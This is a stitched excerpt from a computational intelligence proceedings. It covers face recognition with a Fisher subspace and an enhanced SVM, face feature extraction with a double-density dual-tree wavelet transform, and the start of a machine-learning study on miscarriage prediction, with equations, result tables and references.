w* = arg max_w (w^T S_b w) / (w^T S_w w)    (6)

which reduces to the generalized eigenvalue problem

S_w^{-1} S_b w = λw    (7)
All the original images are projected onto the fisher basis projection matrix by computing
the dot product of the image matrices with each fisher basis projection vector, as expressed
in Eq. (8):

y = w^T X    (8)
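The computation in Eqs. (1)–(8) can be sketched with numpy. This is a minimal sketch, not the authors' implementation: the small ridge term added to keep S_w invertible is an assumption of this illustration.

```python
import numpy as np

def fisher_projection(X, y, s):
    """Project n-dim samples onto the top-s fisher directions (Eqs. 1-8).
    X: (N, n) data matrix, y: (N,) class labels, s <= C - 1."""
    classes = np.unique(y)
    n = X.shape[1]
    mt = X.mean(axis=0)                                # global mean m_t
    Sw = np.zeros((n, n)); Sb = np.zeros((n, n))
    for c in classes:
        Xc = X[y == c]
        mu = Xc.mean(axis=0)
        d = Xc - mu
        Sw += d.T @ d                                  # Eqs. (1), (3)
        diff = (mu - mt)[:, None]
        Sb += len(Xc) * (diff @ diff.T)                # Eq. (4)
    # Generalized eigenproblem Sw^{-1} Sb w = lambda w (Eq. 7);
    # a small ridge keeps Sw invertible (an assumption of this sketch)
    vals, vecs = np.linalg.eig(np.linalg.solve(Sw + 1e-6 * np.eye(n), Sb))
    order = np.argsort(-vals.real)[:s]
    W = vecs[:, order].real                            # (n, s) projection matrix
    return X @ W, W                                    # y = w^T X (Eq. 8)
```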
ESVM stands for enhanced support vector machine [18]. It is a variant of the support
vector machine (SVM). The word "enhanced" signifies the flexibility it provides to the
otherwise strict SVM. It suggests the inclusion of approximate planes (rather than strictly
bounding planes) around which the points of each category are grouped, as illustrated
in Fig. 2.
It is extremely fast and reduces computational time for large data sets. ESVM
classifies linearly or nonlinearly separable data points by assigning them to the nearest
of two parallel planes, which are pushed apart as far as possible (by the term
w^T w + γ²). SVM does not perform well when the target classes overlap; in
such cases, ESVM performs better than SVM. ESVM can solve the given problem
using linear equations, as compared to the quadratic programming used in SVM. From the
computational aspect, ESVM is better than SVM, as observed in Sect. 3.
The equations of the two parallel planes around which the points of each class are
clustered are x^T w − γ = +1 and x^T w − γ = −1, respectively. If a point of a class
does not fall on its plane, say x^T w − γ = −1, and hence does not satisfy the
equation, a quantity ξ is added on the left-hand side: x^T w − γ + ξ = −1. Here ξ
represents the eccentricity of the data point from the plane passing through the
class to which that point belongs.
398 T. Jain and J. Yadav
The learning problem of ESVM is expressed in Eq. (9):

    \min_{(w, γ)} (C/2) ξ^T ξ + (1/2)(w^T w + γ^2)        (9)

subject to

    D(Aw − eγ) + ξ = e        (10)

where
e is a column vector of ones with dimension (number of data points (m) × 1),
d is the vector of target values, the target value of the ith data point being +1 or −1,
D = diag(d), and
A is the matrix of data points in the input space.
To enhance the performance of ESVM, any kernel can be applied to the data matrix A.
For our experiments, three kernels are used: (i) to create a linear classifier using
ESVM, a linear kernel function is applied, k(x_j, x_k) = x_j^T x_k; (ii) to create a
nonlinear classifier using ESVM, a polynomial kernel function is applied,
k(x_j, x_k) = (x_j^T x_k + 1)^z, where z is the order of the polynomial; and (iii) a
Gaussian kernel function is applied, k(x_j, x_k) = exp(−γ ||x_j − x_k||^2).
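The three kernels can be written directly from these definitions; a NumPy sketch, with the γ and z values as illustrative defaults rather than the paper's settings:

```python
import numpy as np

def linear_kernel(xj, xk):
    return float(xj @ xk)                                   # k = x_j^T x_k

def polynomial_kernel(xj, xk, z=2):
    return float(xj @ xk + 1) ** z                          # k = (x_j^T x_k + 1)^z

def gaussian_kernel(xj, xk, gamma=0.5):
    return float(np.exp(-gamma * np.sum((xj - xk) ** 2)))   # k = exp(-γ ||x_j - x_k||^2)
```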
H is computed by Eq. (11):

    H = D [A  −e]        (11)

    u = C r e        (13)

Now, w and γ can easily be computed using Eqs. (14) and (15):

    w = A^T D u        (14)

    γ = −e^T D u        (15)
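Since Eq. (12), which defines r, is not shown above, the sketch below assumes the standard proximal-SVM closed form, u = (I/C + H H^T)^{-1} e, which is consistent with Eqs. (11), (14) and (15); this is a NumPy illustration, not the paper's MATLAB implementation:

```python
import numpy as np

def esvm_train(A, d, C=10.0):
    """Closed-form ESVM training via a linear system (cf. Eqs. (9)-(15)).
    A: (m, n) data matrix; d: (m,) labels in {+1, -1}."""
    m = A.shape[0]
    e = np.ones((m, 1))
    D = np.diag(d.astype(float))
    H = D @ np.hstack([A, -e])                       # Eq. (11): H = D [A  -e]
    u = np.linalg.solve(np.eye(m) / C + H @ H.T, e)  # assumed form of Eqs. (12)-(13)
    w = A.T @ D @ u                                  # Eq. (14)
    gamma = (-e.T @ D @ u).item()                    # Eq. (15)
    return w, gamma

def esvm_predict(A, w, gamma):
    # Each point is assigned to the class of the nearer parallel plane.
    return np.sign(A @ w - gamma).ravel()
```

Note that training solves a single m × m linear system rather than a quadratic program, which is the computational advantage claimed over standard SVM.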
For multiclass classification, two schemes are used, namely one-versus-one (OVO) and
one-versus-all (OVA). The OVA scheme breaks a multiclass classification into one
binary classification problem per class, whereas the OVO strategy divides a multiclass
classification into one binary classification problem per pair of classes.
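The two schemes differ in the number of binary sub-problems they create; a small sketch (the class counts for Yale and ORL are taken from Sect. 3):

```python
# Number of binary classifiers each multiclass scheme requires for C classes.
def n_binary_problems(C, scheme):
    if scheme == "OVA":
        return C                  # one classifier per class
    if scheme == "OVO":
        return C * (C - 1) // 2   # one classifier per pair of classes
    raise ValueError("unknown scheme: " + scheme)

print(n_binary_problems(15, "OVA"))  # Yale, 15 subjects -> 15 problems
print(n_binary_problems(40, "OVO"))  # ORL, 40 subjects -> 780 problems
```

OVO therefore trains many more (but smaller) classifiers as the number of subjects grows.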
3 Experimental Results
To assess the proposed system's performance, tests were performed on the Yale
database, which consists of images in GIF format. There were 15 subjects and 11
images per individual, and the size of each image was 152 × 126 pixels. The proposed
algorithm was implemented in MATLAB 2019. Experiments were performed on a machine
with an Intel Core i5, 2 GHz CPU and 8 GB RAM. Figure 3(a) shows a few sample
images with different expressions (such as happy, normal, surprised and sad), poses
and illumination.
The ORL database consists of images of size 112 × 92 pixels. There were 40
individuals in total, with 10 images per individual in GIF format. These images were
captured with varied facial expressions and changing illumination; they are a
combination of frontal views with minor left-right rotation (Fig. 3(b)).
Fig. 3 a Illustration of Yale face database for a subject, b illustration of ORL face database for a
subject
Three sets of experiments are performed: (i) during feature extraction, the number of
sub-dimensions is selected for different numbers of training images; (ii) ESVM is
applied for multiclass classification, with OVO and OVA applied on both databases;
and (iii) the effect of different kernels on the performance of the learning algorithm
is evaluated. Tests are performed using a linear kernel, a polynomial kernel of
order 2 and a Gaussian kernel.
To determine the minimum number of sub-dimensions required that account for most
of the variation in data, tests are performed with varying sub-dimensions on varying
number of training sets as illustrated in Tables 1 and 2 for Yale and ORL database,
respectively. In order to train the model, three images of every subject are chosen, and
the rest 8 images per subject are used for recognition in Yale database. Similarly, for
ORL database, in order to train the model, three images per subject are chosen, and
the rest 7 images per individual are used for recognition. Different sets of training
Table 1 Result on Yale database when the proposed ESVM system is applied with varying
sub-dimensions, linear kernel and OVA classification on different training sets

Training images    30 sub-dims         40 sub-dims         50 sub-dims         60 sub-dims
per individual     Acc (%)  t_i (s)    Acc (%)  t_i (s)    Acc (%)  t_i (s)    Acc (%)  t_i (s)
4                  83.81    0.177      88.57    0.193      85.71    0.18       82.86    0.172
5                  80       0.206      87.78    0.17       86.67    0.179      84.44    0.17
6                  89.33    0.181      94.67    0.181      96       0.171      96       0.182
7                  90       0.316      93.33    0.166      95       0.16       96.67    0.17
8                  88.89    0.24       95.56    0.175      95.56    0.192      95.56    0.178
9                  96.67    0.176      100      0.171      100      0.172      100      0.174
Table 2 Result on ORL database when the proposed ESVM system is applied with varying
sub-dimensions, linear kernel and OVA classification on different training sets

Training images    30 sub-dims         40 sub-dims         50 sub-dims         60 sub-dims
per individual     Acc (%)  t_i (s)    Acc (%)  t_i (s)    Acc (%)  t_i (s)    Acc (%)  t_i (s)
4                  75.83    0.253      77.92    0.258      80       0.266      81.25    0.273
5                  74.5     0.304      79.5     0.288      84.5     0.371      86       0.302
6                  78.75    0.348      80.63    0.355      84.38    0.362      85       0.358
7                  79.17    0.396      81.67    0.417      86.67    0.407      86.67    0.416
8                  81.25    0.463      83.75    0.479      86.25    0.48       87.5     0.496
9                  87.5     0.607      92.5     0.531      90       0.584      87.5     0.568
images considered are 4, 5, 6, 7, 8 and 9 per individual, respectively, for both the
databases.
The acceptable level of variance depends on the application. For descriptive purposes,
80% of the variance may be required, whereas to perform analyses of the data, at least
90% of the variance may be required. Out of the total sub-dimensions, a maximum
recognition accuracy (Acc) of 100% was achieved on the Yale database with 40
sub-dimensions and 9 training images per individual. Similarly, on the ORL database,
the maximum recognition accuracy of 92.5% was also achieved with 40 sub-dimensions.
So, the number of sub-dimensions considered in the following tests is 40. This also
means computational time can be reduced while keeping the same performance of the
proposed model. The outcomes are shown in Fig. 4.
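The 80%/90% rule described above amounts to picking the smallest number of sub-dimensions whose sorted eigenvalues retain the desired fraction of the total variance; a minimal sketch, with the eigenvalue spectrum below purely illustrative:

```python
import numpy as np

def min_subdimensions(eigvals, threshold=0.90):
    """Smallest k such that the top-k eigenvalues explain at least
    `threshold` of the total variance; eigvals sorted descending."""
    ratios = np.cumsum(eigvals) / np.sum(eigvals)
    return int(np.searchsorted(ratios, threshold) + 1)

eigvals = np.array([5.0, 3.0, 1.0, 1.0])   # illustrative spectrum
print(min_subdimensions(eigvals, 0.90))    # -> 3
```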
As shown in Fig. 5, the computational time of ESVM is much lower than that of SVM.
To compute recognition accuracy using the proposed methodology with 5 training images
and 40 sub-dimensions, the time taken is 0.17 s, whereas with the same settings the
time taken using SVM is 2.91 s. So, the proposed methodology helps reduce
computational time.
After the Fisher subspace phase, using the chosen number of sub-dimensions, the data
set is passed to the ESVM phase, where two categories of classifiers are used, namely
OVO and OVA.
First, ESVM with OVO is applied on the Yale database with different numbers of
training images per subject. To improve the recognition rate of the ESVM system, a
linear kernel with OVA classification is recommended. Table 3 showcases the
performance of this method on the Yale database for different numbers of training
images. There was a significant improvement in accuracy with this system, and it also
worked faster, as illustrated in Fig. 6. The recognition accuracy with OVO
classification was found to be 90% when training with 9 images per individual, while
for the same training images, an accuracy of 100% was achieved with OVA
classification.
Table 3 Result on Yale database when the proposed ESVM system is applied with varying
training images, linear kernel and OVO and OVA classification

Training set    OVA                    OVO
                Acc (%)   t_i (s)      Acc (%)   t_i (s)
4               80.2      0.17         78.2      0.301
5               80        0.177        73.33     0.307
6               97.33     0.172        94.67     0.214
7               96.67     0.175        78.33     0.204
8               97.78     0.174        86.67     0.198
9               100       0.175        90        0.203
Fig. 6 Accuracy of proposed system on a Yale and b ORL database by applying OVO and OVA
at different number of training images
Table 4 Result on ORL database when the proposed ESVM system was applied with varying
training images, linear kernel and OVO and OVA classification

Training set    OVA                    OVO
                Acc (%)   t_i (s)      Acc (%)   t_i (s)
4               77.92     0.258        51.25     0.711
5               79.5      0.288        55.5      0.672
6               80.63     0.355        45.63     0.665
7               81.67     0.417        46.67     0.61
8               83.75     0.479        48.75     0.556
9               92.5      0.531        42.5      0.498
To further enhance the performance of ESVM, tests were done with different kernels and
varying numbers of training images. Kernels are mathematical functions used by an SVM
algorithm to transform data into the preferred form; commonly used kernel functions
are linear, polynomial, sigmoid and Gaussian. On the Yale database, the combination of
a linear kernel with OVA gave the best results. Recognition accuracy with a polynomial
kernel of order 2 and OVA classification was found to be 85.33%, whereas with the
Gaussian kernel it improved to 93.33%,
Table 5 Result on Yale and ORL databases when the proposed ESVM system was applied
with different kernels and OVA classification on different training sets

Kernel             YALE                   ORL
                   Acc (%)   t_i (s)      Acc (%)   t_i (s)
Linear (1)         100       0.171        92.5      0.545
Polynomial (2)     85.33     0.179        82.5      0.603
Gaussian (3)       93.33     0.209        57.5      0.123
Fig. 7 Accuracy of proposed system on Yale and ORL databases by applying different
kernels at different numbers of training images
and with the linear kernel, we attained a maximum accuracy rate of 100% with 9
training images per individual. The time taken to compute is also lowest with the
linear kernel, as shown in Table 5.
On the ORL database, recognition accuracy with a polynomial kernel of order 2 and OVA
classification was found to be 57.5%, whereas with the Gaussian kernel it improved to
82.5%, and with the linear kernel we attained a maximum accuracy rate of 92.5% with
9 training images per individual, as shown in Table 5 (a comparison of ORL and Yale is
shown in Fig. 7).
Table 7 Proposed methodology comparison with various techniques on ORL database

Approach                                               Accuracy rate (%)
PCA_KNN (k = 5) [23] (no. of training images = 7)      72
PCA_SVM (poly quad) [24]                               72.9
PCA_SVM (poly linear) [24]                             76.7
PCA_KNN (k = 3) [23] (no. of training images = 7)      78
DCT_PCA [25] (no. of training images = 6)              91.84
Proposed methodology (no. of training images = 9)      92.5
5 Conclusion
In this paper, a technique for multiclass classification of faces based on ESVM in
Fisher subspace has been proposed. The proposed multi-classification technique was
applied to the Yale and ORL databases, on which accuracies of 100% and 92.5%,
respectively, were achieved. The method outperforms traditional SVM, as shown in the
comparison, and is computationally faster. A number of experiments were performed with
different kernels of the proposed ESVM technique and with varying dimensions to
achieve high accuracy. ESVM works best with a linear kernel using the OVA
classification method and performs better than the other techniques. As future work,
we are applying wavelets in combination with our proposed methodology and exploring
other machine learning algorithms for classification.
References
19. Rajpal, N., Singh, A., & Yadav, J. (2018). An expression invariant face recognition based on
proximal support vector machine. In 2018 4th International Conference for Convergence in
Technology (I2CT) (pp. 1–7). https://doi.org/10.1109/I2CT42659.2018.9058243.
20. Ouyang, A., Liu, Y., Pei, S., Peng, X., He, M., & Wang, Q. (2020). A hybrid improved
kernel LDA and PNN algorithm for efficient face recognition. Neurocomputing, 393, 214–222.
https://doi.org/10.1016/j.neucom.2019.01.117.
21. Zhang, T., Tang, Y. Y., Fang, B., Shang, Z., & Liu, X. (2009). Face recognition under varying
illumination using gradientfaces. IEEE Transactions on Image Processing, 18(11), 2599–2606.
https://doi.org/10.1109/TIP.2009.2028255
22. Nayef Al-Dabagh, M. Z., Mohammed Alhabib, M. H., & AL-Mukhtar, F. H. (2018). Face
recognition system based on kernel discriminant analysis, k-nearest neighbor and support
vector machine. International Journal of Research and Engineering, 5(3), 335–338.
23. Rakshit, P., Basu, R., Paul, S., Bhattacharyya, S., Mistri, J., & Nath, I. (2019). Face detection
using support vector machine with PCA. In 2nd International Conference on Non-Conventional
Energy: Nanotechnology and Nanomaterials for Energy and Environment (ICNNEE).
24. Gumus, E., Kilic, N., Sertbas, A., & Ucan, O. N. (2010). Evaluation of face recognition using
PCA, wavelets and SVM. Expert Systems with Applications, 37, 6404–6408. https://doi.org/
10.1016/j.eswa.2010.02.079.
25. Abikoye, O. C., Shoyemi, I. F., & Aro, T. O. (2019). Comparative analysis of illumination
normalizations on principal component analysis based feature extraction for face recognition.
FUOYE Journal of Engineering and Technology, 4(1), 67–69.
Large Scale Double Density Dual Tree
Complex Wavelet Transform Based
Robust Feature Extraction for Face
Recognition
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 409
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_33
410 J. Chaudhary and J. Yadav
This section presents a preliminary description of the major multi-resolution spectral
analysis techniques for images based on wavelet transforms. The discrete wavelet
transform (DWT) analyzed in study [12] shows that it is possible to decompose a
digital image into "approximation coefficients", which are the low-frequency content,
and "detailed coefficients", which are the high-frequency components of the image. A
2D-DWT decomposes an image into three detailed sub-bands (LH, HL and HH)
corresponding to vertical, horizontal and diagonal directional details, respectively,
while the LL (approximation) sub-image provides the low-frequency details of the
image. The major shortcomings of the DWT are its shift (translation) variance and its
lack of directional selectivity, with only a few orientations: 0°, ±45° and ±90°.
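A one-level 2D DWT producing the LL, LH, HL and HH sub-bands can be sketched with the Haar filter (chosen here for brevity; the filters used in the study may differ):

```python
import numpy as np

def haar_dwt2(img):
    """One-level 2D DWT with the Haar filter. Returns the approximation
    (LL) and detailed (LH, HL, HH) sub-bands at half resolution.
    img: 2D array with even height and width."""
    # Filter along the horizontal direction: average = low-pass, difference = high-pass.
    lo = (img[:, 0::2] + img[:, 1::2]) / 2.0
    hi = (img[:, 0::2] - img[:, 1::2]) / 2.0
    # Repeat along the vertical direction on each half.
    LL = (lo[0::2, :] + lo[1::2, :]) / 2.0   # low/low: approximation
    LH = (lo[0::2, :] - lo[1::2, :]) / 2.0   # low horizontal, high vertical
    HL = (hi[0::2, :] + hi[1::2, :]) / 2.0   # high horizontal, low vertical
    HH = (hi[0::2, :] - hi[1::2, :]) / 2.0   # high/high: diagonal detail
    return LL, LH, HL, HH
```

On a constant image all three detailed sub-bands are zero, which is a quick sanity check of the decomposition.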
Dual tree complex wavelet transform (DTCWT) was introduced in study [13] to overcome
this weakness of DWT, which provides less discriminative power for face image
features. The technique solves the issue of shift or translation variance, as a small
change in the input does not cause interference in the wavelet coefficients. DTCWT
also provides good angular resolution, which gives better directional selectivity in
terms of orientation angles. In DTCWT, the filter bank used in the first level of
decomposition must differ from the filters used at subsequent stages. DTCWT generates
wavelet coefficients of three orientations, namely LH, HL and HH. The six directional
sub-bands formed at the real and imaginary trees, LH+, HH+, HL+, LH−, HH− and HL−,
describe edges (high-frequency components) oriented at −75°, −45°, −15°, +15°, +45°
and +75°, respectively.
Double density discrete wavelet transform (DD_DWT) is a variant of DWT proposed in the
study of Selesnick in 2004 [14]. This technique has a 3-channel filter bank structure
with one scaling (low-pass) and two wavelet (high-pass) functions. Unlike DTCWT, in
this method the same filters are used in all subsequent stages.
The detailed sub-bands are generated by the filter combinations [H1_H2, H1_H3, H2_H1,
H2_H2, H2_H3, H3_H1, H3_H2, H3_H3], where H1 represents the low-pass filter and
H2, H3 are the two high-pass filters. Different analysis filters are used in the first
stage and at the next higher levels of decomposition. In this way, DD_DTCWT also
provides good directional selectivity through small-scale feature selection. Each tree
contains one low-pass (approximation) sub-band and eight detailed (high-pass)
sub-bands. The design implementation of DD_DTCWT at the first level of decomposition
is demonstrated in Fig. 1.
Q = AT A (1)
2.3 Classification
The work has utilized the cosine angle distance [18] metric, cos(X, Y), for the ORL
database, which is calculated as provided in Eq. (5):

    cos(X, Y) = \sum_{i=1}^{n} X_i Y_i / ( \sqrt{\sum_{i=1}^{n} X_i^2} \sqrt{\sum_{i=1}^{n} Y_i^2} )        (5)
The distances between the test image and each face vector in the training sample are
arranged in increasing order, and the minimum distance gives the nearest neighbor
(matched image). To determine the efficiency and accuracy of the proposed system, the
recognition rate is calculated as the percentage ratio of matched images to the total
number of images in the test set.
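Equation (5), together with the nearest-neighbor matching and the recognition-rate computation, can be sketched as follows (NumPy for illustration; maximizing cosine similarity is equivalent to minimizing the cosine angle distance):

```python
import numpy as np

def cosine_similarity(x, y):
    # Eq. (5): sum(x_i y_i) / (sqrt(sum x_i^2) * sqrt(sum y_i^2))
    return float(x @ y / (np.linalg.norm(x) * np.linalg.norm(y)))

def nearest_neighbor(test_vec, train_vecs, train_labels):
    # The largest cosine similarity gives the smallest angular distance.
    sims = [cosine_similarity(test_vec, t) for t in train_vecs]
    return train_labels[int(np.argmax(sims))]

def recognition_rate(predicted, actual):
    # Percentage ratio of matched images to the total test set.
    return 100.0 * float(np.mean(np.asarray(predicted) == np.asarray(actual)))
```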
In the proposed work, face recognition is performed in two phases, namely training and
testing (recognition) of face images. In the first stage, robust feature extraction on
the considered face image database is performed based on the DD_DTCWT technique, with
different filters in the first level and the subsequent levels of decomposition. The
selection of the appropriate sub-band and level of decomposition is performed through
extensive experiments, by varying the number of decomposition levels and the number of
training images per subject of the face database. At each level, the approximation
sub-image is selected for further decomposition, which yields better results.
Furthermore, the dimensionality reduction of the transformed face images
3 Experimental Results
This section provides a description of the datasets utilized in the work. The
selection of the DD_DTCWT sub-band and level of decomposition for the comprehensive
experiments is also illustrated.
3.1 Dataset
The proposed work has utilized the ORL and YALE face image databases to estimate the
accuracy rate. The ORL database consists of 400 grayscale images, each with resolution
112 × 92, in PNG format. This database includes 40 subjects, each with 10 varying
images. Likewise, the YALE database has 165 images of 15 subjects; each subject has 11
different images with resolution 243 × 320 in GIF format. The face images in the YALE
database have varying effects of illumination and facial expression, such as sad,
happy, wink and surprised.
The decomposition of an ORL sample face image at level 1 using DD_DTCWT is shown in
Fig. 3a. The figure depicts the low-pass/approximation sub-bands formed for the real
and imaginary parts, respectively. The detailed sub-band of the ORL face image (first
orientation) is represented in Fig. 3b.
Fig. 3 Decomposition of ORL face image using DD_DTCWT: a Approximation sub-image formed
on real and imaginary trees. b Detailed/High pass sub-bands formed on real and imaginary trees
Table 1 Experimental results on ORL database (400 total images) with decomposition
level 3 and approximation sub-band selection

Number of training images per subject      Recognition rate (%)    Computational time (s)
(total number of testing images)
5 (200)                                    93.5                    3.063
6 (160)                                    95                      2.495
7 (120)                                    96.6                    1.905
8 (80)                                     97.5                    1.448
Table 2 Results on YALE database (165 total images) with decomposition level 3 and
approximation sub-band selection

Number of training images per subject      Recognition rate (%)    Computational time (s)
(total number of testing images)
6 (75)                                     86.6                    6.695
7 (60)                                     88.3                    4.594
8 (45)                                     84.4                    3.738
9 (30)                                     100                     2.295
The results attained with the proposed approach on the ORL database are compared with
five techniques, namely DWT_PCA_SVM, DWT_FLD_SVM, DWT_DLDA_SVM, MODULAR-2DPCA and
(MF_GF_HE)_PCA_MultiSVM, as illustrated in Table 3. In a similar manner, the
experimental results obtained on the YALE database are compared with five techniques:
IKLDA_PNN, GSB2DLPP, MLTP_SVM, HE_GLPF_Gabor_PCA_SVM and RRHE-RFDWPT. The summary of
results attained in the above-stated previous work is presented in Table 4.
Consequently, the comparison observed in Table 4 demonstrates that the proposed
methodology provides promising results when compared with other techniques. It is also
observed that the RRHE-RFDWPT methodology [26] provides its best accuracy rate of
98.67% with 6 training images, while utilizing preprocessing techniques to attain
illumination normalization for invariant feature extraction. In our work, however, no
preprocessing techniques are employed, yet a 100% recognition rate is attained with 9
images in the training set.
5 Conclusion
References
1. Zhao, W., Chellappa, R., Phillips, P. J., & Rosenfeld, A. (2003). Face recognition:
A literature survey. ACM Computing Surveys, 35(4), 399–458.
2. Li, S. Z., & Jain, A. K. (2005). Handbook of face recognition. Springer.
3. Yadav, J., Rajpal, N., & Mehta, R. (2018). A new illumination normalization framework via
homomorphic filtering and reflectance ratio in DWT domain for face recognition. Journal of
Intelligent and Fuzzy Systems, 35, 5265–5277.
4. Yadav, J., Rajpal, N., & Mehta, R. (2018). An improved hybrid illumination normalization
and feature extraction model for face recognition. International Journal of Applied Pattern
Recognition, 149–170.
5. Selvakumar, K., Jerome, J., & Rajamani, K. (2016) Robust face identification using DTCWT
and PCA subspace based sparse representation. Multimedia Tools and Applications, 16073–
16092.
6. Wang, J. W. et al. (2018). Illumination compensation for face recognition using adaptive
singular value decomposition in the wavelet domain. Information Sciences, 435, 69–93.
7. Vishwakarma, V., & Dalal, S. (2020). A novel non-linear modifier for adaptive illumination
normalization for robust face recognition. Multimedia Tools Applications, 79, 11503–11529.
8. Lahaw, Z., Essaidani, D., & Seddik, H. (2018). Robust face recognition approaches using PCA,
ICA, LDA based on DWT, and SVM algorithms. In 2018 41st International Conference on
Abstract Miscarriage or spontaneous abortion is the natural death of the fetus before
20 weeks of pregnancy. Stillbirth is the term used to refer to the fetus’s demise after
this period. Miscarriage can harm both the parents. One cannot reverse the outcome
of pregnancy. The only way to deal with miscarriage is to take certain precautions
and prevent it. With this objective, this study uses various machine learning tech-
niques such as Logistic Regression, K-Nearest Neighbors, and Random Forest to
predict a pregnancy’s outcome based on specific features. This paper focuses on
each model’s contribution and compares the algorithms’ efficiency based on some
standard evaluation measures.
1 Introduction
The most common reason for losing a baby during pregnancy is miscarriage. The March of
Dimes, an organization working on maternal and child health, reported that a 10–15%
miscarriage rate is present among women who are aware of their pregnancy. Nearly 2
million babies are stillborn every year. These numbers may be higher, as there is no
systematic recording of miscarriages and stillbirths, even in developed countries.
There are various causes of miscarriage, some of the common ones being the
mother’s age, chromosomal abnormalities, and uterine infections. Since spontaneous
abortion is an irreversible phenomenon, this affects the physiological and psycho-
logical well-being. Recurrent miscarriages are likely to have far-reaching negative
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 423
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_34
424 S. Biswas and S. Shukla
impacts on both the parents. The only solution that can be beneficial is the preven-
tion of miscarriage. Henceforth, it is necessary to predict whether a pregnant woman
is likely to experience miscarriage, based on some standard criteria, as early as
possible. This work employs various machine learning classification algorithms for
this purpose. The main objective is to facilitate easy prediction of pregnancy outcome
to prevent miscarriage.
The remainder of the paper is organized as follows. In Sect. 2, we review the existing
literature on the prediction of miscarriage and its prevention. Section 3 explains the
methodology used to achieve the study's objective, followed by the experimental
results and discussion. Finally, we conclude and list the references used for the
analysis.
2 Related Work
Magnus et al. [1] estimated the rate of miscarriage by associating it with the woman’s
age and pregnancy history using logistic regression, sensitivity analysis, and cluster
variance estimation. However, miscarriage can result from various underlying biolog-
ical and psychological causes, which form significant risk factors. The study did not
consider these factors.
Bruno et al. [2] designed a support decision system tool using a support vector
machine to group recurrent pregnancy loss (RPL) patients into four risk classes based
on the number of miscarriages. The model built using the most informative features
showed unbalanced accuracy, and when the authors used the features recommended by the
European Society of Human Reproduction and Embryology (ESHRE), the accuracy obtained
was very low. Hence, the system is less reliable.
In [3], the authors constructed and compared six machine learning classification
models, namely logistic regression, support vector machine (SVM), decision tree,
backpropagation neural network (BNN), extreme gradient boosting, and random
forest. They did this to predict early pregnancy loss in patients undergoing in-vitro
fertilization-embryo transfer, after embryonic cardiac activity had been observed.
They suggested random forest for doctors' better clinical decisions, as its
performance outperformed that of the other models. However, the study did not specify
the reason for choosing BNN rather than any other neural network.
Pruthi et al. [4] predicted high-risk pregnancies using decision tree, SVM, Naïve
Bayes, a neural network associative classifier, and logistic regression, by
considering the factors responsible for pregnancy risk. They used a dataset containing
all the historic maternal information for this purpose, but this dataset is not
documented in the paper, and no data mining or data processing through deep learning
or other advanced techniques, which could have improved the accuracy, is reported.
Asri et al. [5] designed a framework for continuous monitoring in which the
unsupervised ML algorithm K-means clustering was used in Apache Spark. The algorithm
takes in the data input received through the mobile application and sensors and
predicts the risk of miscarriage based on them. The aim is fast execution with the
highest classification accuracy; the drawback is that the model giving the highest
result does not provide much accuracy. Also, the data used are highly biased toward
one particular age group.
A Miscarriage Prevention System Using Machine Learning Techniques 425
Srinivasa et al. [6] presented four critical machine learning and deep learning
techniques in a theoretical manner to assist gynecologists in the improved treatment
of infertile women. They performed machine learning on past infertility data and then
updated the deep learning process. However, the study did not address the practicality
of the approach.
In [7], the authors conducted a survey study on 293 pregnant women attending an
early pregnancy assessment unit (EPAU). They designed the questionnaire based on
the literature review, also considering data from validated psychometric tests. They
used logistic regression to find the probability of miscarriage for all the independent
variables. The study found significant associative results but used no other algorithm
to validate the accuracy.
Koivu et al. [8] constructed classifiers using logistic regression, artificial neural
network, and gradient boosting decision trees on a CDC dataset with almost sixteen
million records. They further used the NYC dataset for evaluating the predictive
models created using the former dataset. Using the SELU network, they predicted
the early stillbirth. However, this network restricts improvements to within four
layers. The prediction performance could be improved by balancing the classes in the
data.
To stratify pregnancies with a high risk of stillbirth in [9], the authors developed a
set of different models to predict stillbirth. They did this using five machine learning
algorithms for binary classification, namely regularized logistic regression, decision
trees based on classification and regression trees (CART), random forest, extreme
gradient boosting, and a multilayer perceptron neural network. They validated the
method using the stratified K-folds technique. Although extreme gradient boosting
achieves the highest accuracy, the predictors' accuracy varies throughout the
gestational period. The exact timing of the predictors used was unavailable, and not
all risk factors are known at a given point in time.
In [10], the authors developed a machine learning model using the extreme
gradient boosting algorithm to predict the presence of gestational diabetes mellitus
(GDM) in 19,331 women during their early pregnancy stage. They compared this
algorithm’s performance with a logistic model, which underperformed here. We do
not see any other algorithm for comparison, and hence, it will be unreliable to term
the model as the optimal one for the desired purpose.
The authors applied the C4.5 decision tree algorithm in [11] on the pregnancy
data in two ways: standardized and unstandardized. The classification performance
was better in standardized data with better accuracy and less error. The study was
limited to one algorithm for pregnancy-based classification.
A K-means clustering approach was applied in [12] on a controlled trial of preg-
nant women during the first trimester of pregnancy to analyze the presence of
hypothyroidism and the associated risk factors. As a result, the authors identified
three distinct clusters. Also, cluster analysis took into account the heterogeneity in
the study. But this analytical study lacked generalization, and the authors need to
consider a larger sample for validating the achieved associations.
Chang et al. [13] used the self-organizing map (SOM) technique and K-Modes
to generate co-morbidity-based clusters. Clusters were identified and validated for
diabetes mellitus and pregnancy cases ranging from standard to preterm birth. The SOM
technique identified cluster structures more quickly and accurately than the K-Modes
method. However, no domain expert validated the results, and therefore the results
cannot be extended to clinical significance.
Tahir et al. [14] designed a neural network to classify preeclampsia (PE) based on a
dataset having 17 parameters. The algorithm was applied once considering the previous
PE case history and once excluding it; accuracy decreased significantly when the model
did not use the previous PE cases. The neural network resulted in more accurate
classification than other algorithms, namely Naive Bayes, K-nearest neighbors, linear
regression, logistic regression, and support vector machine. Accuracy could be further
increased using feature selection methods.
Andriani et al. [15] developed an automatic classification algorithm, using CNN, to
detect the presence of a blighted ovum in ultrasound images. Detection of a blighted
ovum at an early stage can save the underdeveloped fetus. The model trained the images
using the Keras library in Python. The detection accuracy was less than 60%, which
could be improved by using more inputs for training and by adding a pre-processing
stage that makes data inputs with high similarity levels easier to differentiate.
An expert system using an artificial neural network and the backpropagation algorithm
was proposed by Malyawati et al. [16] for early prediction of critical pregnancy.
Using 17 input parameters and five output classes, an accuracy of 78.248% was
achieved. All the symptoms considered formed a single pattern, and the system used
various ratios of training and testing data. The small size of the input data may have
compromised the system's accuracy.
In [17], the authors developed a multilayer neural network using 308 features of
